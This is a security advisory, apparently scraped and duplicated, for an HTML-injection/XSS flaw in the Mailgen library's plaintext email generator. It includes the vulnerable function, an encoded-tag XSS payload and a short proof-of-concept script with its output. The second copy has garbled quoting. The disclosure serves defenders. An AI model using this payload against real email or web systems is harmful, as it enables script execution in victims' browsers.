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GHSA-xw6r-chmh-vpmj: Mailgen has HTML Injection and XSS Filter Bypass in Plaintext Emails

Summary

An HTML injection vulnerability in plaintext emails generated by Mailgen has been discovered. Your project is affected if you use the Mailgen.generatePlaintext(email) method and pass in user-generated content. The issue was discovered and reported by Edoardo Ottavianelli (@edoardottt).

Details

The following function (inside index.js) is intended to strip all HTML content to produce a plaintext string.

// Plaintext text e-mail generator
Mailgen.prototype.generatePlaintext = function (params) {
    // Plaintext theme not cached?
    if (!this.cachedPlaintextTheme) {
        throw new Error('An error was encountered while loading the plaintext theme.');
    }
   
    // Parse email params and get back an object with data to inject
    var ejsParams = this.parseParams(params);

    // Render the plaintext theme with ejs, injecting the data accordingly
    var output = ejs.render(this.cachedPlaintextTheme, ejsParams);

    // Definition of the <br /> tag as a regex pattern
    var breakTag = /(?:\<br\s*\/?\>)/g;
    var breakTagPattern = new RegExp(breakTag);

    // Check the plaintext for html break tag, maintains backwards compatiblity
    if (breakTagPattern.test(this.cachedPlaintextTheme)) {
        // Strip all linebreaks from the rendered plaintext
        output = output.replace(/(?:\r\n|\r|\n)/g, '');

        // Replace html break tags with linebreaks
        output = output.replace(breakTag, '\n');

        // Remove plaintext theme indentation (tabs or spaces in the beginning of each line)
        output = output.replace(/^(?: |\t)*/gm, "");
    }

    // Strip all HTML tags from plaintext output
    output = output.replace(/<.+?>/g, '');

    // Decode HTML entities such as &copy;
    output = he.decode(output);

    // All done!
    return output;
};

The process fails because it searches for HTML tags and attempts to strip them from the input. However, if the HTML tags are encoded, they are not removed. These encoded tags are then decoded later and become valid HTML content, which can lead to XSS vulnerabilities.

A valid payload is: &ltimg src=xyz onerror=alert(1)&gt.

PoC

var Mailgen = require('mailgen');

// Configure mailgen by setting a theme and your product info
var mailGenerator = new Mailgen({
    theme: 'default',
    product: {
        // Appears in header & footer of e-mails
        name: 'Mailgen',
        link: 'https://mailgen.js/'
        // Optional product logo
        // logo: 'https://mailgen.js/img/logo.png'
    }
});

var email = {
    body: {
        name: 'John &ltimg src=x onerror=alert(document.body.innerHTML)&gt Appleseed',
        intro: 'Welcome to Mailgen! We\'re very excited to have you on board.',
        action: {
            instructions: 'To get started with Mailgen, please click here:',
            button: {
                color: '#22BC66', // Optional action button color
                text: 'Confirm your account',
                link: 'secret-link'
            }
        },
        outro: 'Need help, or have questions? Just reply to this email, we\'d love to help.'
    }
};

var emailText = mailGenerator.generatePlaintext(email);
require('fs').writeFileSync('emailText.html', emailText, 'utf8');

Resulting output file (emailText.html):

Hi John <img src=x onerror=alert(document.body.innerHTML)> Appleseed,

Welcome to Mailgen! We're very excited to have you on board.        

To get started with Mailgen, please click here:        
secret-link            

Need help, or have questions? Just reply to this email, we'd love to help.        

Yours truly,  
Mailgen

© 2025 Mailgen. All rights reserved.

Impact

Depending on the context/environment where the plaintext message is used, if HTML is rendered and executed can result in arbitrary code execution in the browser of the victim (potentially stealing secrets or sensitive information contained in the message).

Credits

Edoardo Ottavianelli (@edoardottt)

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#xss#vulnerability#apple#js#java

Summary

An HTML injection vulnerability in plaintext emails generated by Mailgen has been discovered. Your project is affected if you use the Mailgen.generatePlaintext(email) method and pass in user-generated content. The issue was discovered and reported by Edoardo Ottavianelli (@edoardottt).

Details

The following function (inside index.js) is intended to strip all HTML content to produce a plaintext string.

// Plaintext text e-mail generator Mailgen.prototype.generatePlaintext = function (params) { // Plaintext theme not cached? if (!this.cachedPlaintextTheme) { throw new Error(‘An error was encountered while loading the plaintext theme.’); }

// Parse email params and get back an object with data to inject
var ejsParams \= this.parseParams(params);

// Render the plaintext theme with ejs, injecting the data accordingly
var output \= ejs.render(this.cachedPlaintextTheme, ejsParams);

// Definition of the <br /> tag as a regex pattern
var breakTag \= /(?:\\<br\\s\*\\/?\\>)/g;
var breakTagPattern \= new RegExp(breakTag);

// Check the plaintext for html break tag, maintains backwards compatiblity
if (breakTagPattern.test(this.cachedPlaintextTheme)) {
    // Strip all linebreaks from the rendered plaintext
    output \= output.replace(/(?:\\r\\n|\\r|\\n)/g, '');

    // Replace html break tags with linebreaks
    output \= output.replace(breakTag, '\\n');

    // Remove plaintext theme indentation (tabs or spaces in the beginning of each line)
    output \= output.replace(/^(?: |\\t)\*/gm, "");
}

// Strip all HTML tags from plaintext output
output \= output.replace(/<.+?\>/g, '');

// Decode HTML entities such as &copy;
output \= he.decode(output);

// All done!
return output;

};

The process fails because it searches for HTML tags and attempts to strip them from the input. However, if the HTML tags are encoded, they are not removed. These encoded tags are then decoded later and become valid HTML content, which can lead to XSS vulnerabilities.

A valid payload is: &ltimg src=xyz onerror=alert(1)&gt.

PoC

var Mailgen = require(‘mailgen’);

// Configure mailgen by setting a theme and your product info var mailGenerator = new Mailgen({ theme: 'default’, product: { // Appears in header & footer of e-mails name: 'Mailgen’, link: ‘https://mailgen.js/’ // Optional product logo // logo: ‘https://mailgen.js/img/logo.png’ } });

var email = { body: { name: 'John &ltimg src=x onerror=alert(document.body.innerHTML)&gt Appleseed’, intro: 'Welcome to Mailgen! We\’re very excited to have you on board.’, action: { instructions: 'To get started with Mailgen, please click here:’, button: { color: '#22BC66’, // Optional action button color text: 'Confirm your account’, link: ‘secret-link’ } }, outro: ‘Need help, or have questions? Just reply to this email, we\’d love to help.’ } };

var emailText = mailGenerator.generatePlaintext(email); require(‘fs’).writeFileSync('emailText.html’, emailText, ‘utf8’);

Resulting output file (emailText.html):

Hi John <img src=x onerror=alert(document.body.innerHTML)> Appleseed,

Welcome to Mailgen! We’re very excited to have you on board.

To get started with Mailgen, please click here:
secret-link

Need help, or have questions? Just reply to this email, we’d love to help.

Yours truly,
Mailgen

© 2025 Mailgen. All rights reserved.

Impact

Depending on the context/environment where the plaintext message is used, if HTML is rendered and executed can result in arbitrary code execution in the browser of the victim (potentially stealing secrets or sensitive information contained in the message).

Credits

Edoardo Ottavianelli (@edoardottt)

References

  • GHSA-xw6r-chmh-vpmj
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62366
  • eladnava/mailgen@7279a98

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